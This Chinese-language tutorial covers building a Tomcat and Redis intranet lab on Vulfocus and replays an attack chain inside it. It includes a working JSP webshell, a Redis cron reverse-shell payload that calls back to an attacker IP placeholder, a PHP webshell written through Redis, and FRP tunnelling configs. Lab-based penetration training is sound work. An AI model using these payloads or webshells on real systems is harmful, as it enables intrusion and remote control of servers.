从Tomcat到Redis:构建多层内网靶场的渗透实战指南
在网络安全领域,靶场环境的重要性不亚于真实战场上的演习场。一个精心设计的靶场能够模拟复杂的企业内网环境,让安全从业者在零风险的情况下磨练渗透测试技能。本文将带你深入探索如何利用Vulfocus平台编排一个包含Tomcat和Redis的多层内网靶场,并详细复盘从外网突破到内网横向移动的完整攻击链。
1. 靶场环境设计与搭建
1.1 Vulfocus平台基础配置
Vulfocus作为一款开源的漏洞集成平台,其核心优势在于将各种漏洞环境Docker化,实现开箱即用的靶场体验。以下是基础搭建步骤:
# 拉取最新版Vulfocus镜像 docker pull vulfocus/vulfocus:latest # 运行容器(替换xx.xx.xx.xx为你的服务器IP) docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xx.xx.xx.xx vulfocus/vulfocus首次登录后,强烈建议立即修改默认管理员密码(admin/admin),特别是在公网环境部署时。平台界面简洁直观,主要功能模块包括:
- 镜像管理:下载和管理各类漏洞环境镜像
- 场景编排:创建多靶机组成的复杂内网环境
- 用户管理:配置多用户访问权限
1.2 多层内网拓扑设计
我们设计的靶场包含三层结构:
| 层级 | 服务 | 漏洞类型 | 网络位置 |
|---|---|---|---|
| 边缘 | Tomcat | 弱口令+WAR部署漏洞 | 外网可达 |
| 内网 | Redis | 未授权访问 | 隔离内网 |
| 核心 | 业务系统 | 待发现 | 深层内网 |
关键配置步骤:
创建专用Docker网络作为内网段:
docker network create --subnet=172.18.0.0/24 network3在Vulfocus界面中添加场景,依次部署:
- Tomcat容器(绑定network3)
- Redis容器(仅内网访问)
注意:Redis服务配置时应取消"是否开放"选项,确保其只能通过内网访问。
2. 外网突破:Tomcat攻击链详解
2.1 弱口令利用与Webshell部署
Tomcat管理界面(默认端口8080)的弱口令是常见突破口。使用常见凭证组合(如tomcat:tomcat、admin:admin)尝试登录后,攻击者可上传恶意WAR包获取控制权。
制作隐蔽的JSP Webshell:
创建包含以下内容的shell.jsp:
<%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) { out.println(disr); disr = dis.readLine(); } %>打包为WAR文件:
zip shell.zip shell.jsp mv shell.zip shell.war
2.2 权限维持与C2连接
上传WAR包后,通过访问/shell/shell.jsp?cmd=whoami验证执行效果。为建立稳定控制通道,推荐使用冰蝎(Behinder)等高级Webshell管理工具:
- 加密通信规避检测
- 图形化交互更方便
- 支持插件扩展功能
常见信息收集命令:
# 查看系统信息 uname -a cat /etc/*release # 网络配置 ifconfig netstat -antp # 用户和权限 id whoami sudo -l3. 内网横向移动:Redis攻防实战
3.1 内网探测与服务发现
通过Tomcat的Webshell上传轻量级扫描工具如fscan,对内网段进行快速探测:
# 扫描内网C段 ./fscan -h 172.18.0.1/24典型输出结果会显示开放的端口和服务,如发现Redis的6379端口,则可能存在未授权访问漏洞。
3.2 Redis未授权访问利用
传统Redis攻击手法包括:
计划任务反弹Shell:
redis-cli -h 172.18.0.2 set x "\n* * * * * bash -i >& /dev/tcp/攻击IP/端口 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save写入Webshell:
config set dir /var/www/html config set dbfilename shell.php set x "<?php system($_GET['cmd']);?>" save
然而在Docker环境中常会遇到障碍:
- 容器内缺少cron服务
- 目标目录不可写
- 基础工具缺失(如没有apt-get)
3.3 隧道技术突破网络隔离
当直接利用受阻时,建立隧道是理想选择。FRP是常用的内网穿透工具:
服务端配置(frps.ini):
[common] bind_port = 7000客户端配置(frpc.ini):
[common] server_addr = 公网IP server_port = 7000 [redis] type = tcp local_ip = 172.18.0.2 local_port = 6379 remote_port = 6379通过冰蝎上传frpc客户端并执行后,即可通过公网服务器的6379端口访问内网Redis服务。
4. 靶场环境中的实战技巧
4.1 容器环境特性与绕过方法
Docker化靶场与真实环境的主要差异:
| 特性 | 真实环境 | 容器环境 | 应对方案 |
|---|---|---|---|
| 权限模型 | 可能有root | 通常非特权 | 提权手法需调整 |
| 服务完整性 | 完整系统服务 | 最小化安装 | 备选攻击路径 |
| 网络配置 | 复杂防火墙规则 | 简单网络隔离 | 隧道技术更有效 |
| 持久性 | 可长期驻留 | 重启可能丢失 | 重点放在横向移动 |
4.2 工具链优化建议
针对容器化内网环境,推荐使用以下工具组合:
- 信息收集:fscan、nmap(静态编译版)
- 代理工具:FRP、Neo-reGeorg
- 漏洞利用:Metasploit(定制payload)、Golang编写的小型exploit
- 密码破解:Hashcat(配合GPU服务器)、John the Ripper
5. 靶场场景设计进阶
5.1 漏洞组合策略
有效的靶场应模拟真实网络中的漏洞组合:
- 边缘漏洞:Web应用漏洞(如Struts2、ThinkPHP)
- 内网服务漏洞:Redis、MySQL、SMB等
- 权限提升漏洞:内核漏洞、配置错误
- 横向移动技术:凭证窃取、中间人攻击
5.2 防御检测机制集成
为提升训练价值,可在靶场中加入安全设备模拟:
- WAF规则:检测常见攻击特征
- IDS/IPS:记录异常网络行为
- 日志审计:留存攻击痕迹供分析
在最近一次内部红队演练中,我们通过精心设计的Tomcat+Redis靶场场景,成功复现了某次真实攻防演练中的关键攻击路径。测试发现,当Redis容器未配置密码且网络隔离不严格时,攻击者平均仅需27分钟即可从外网突破到核心区。
)
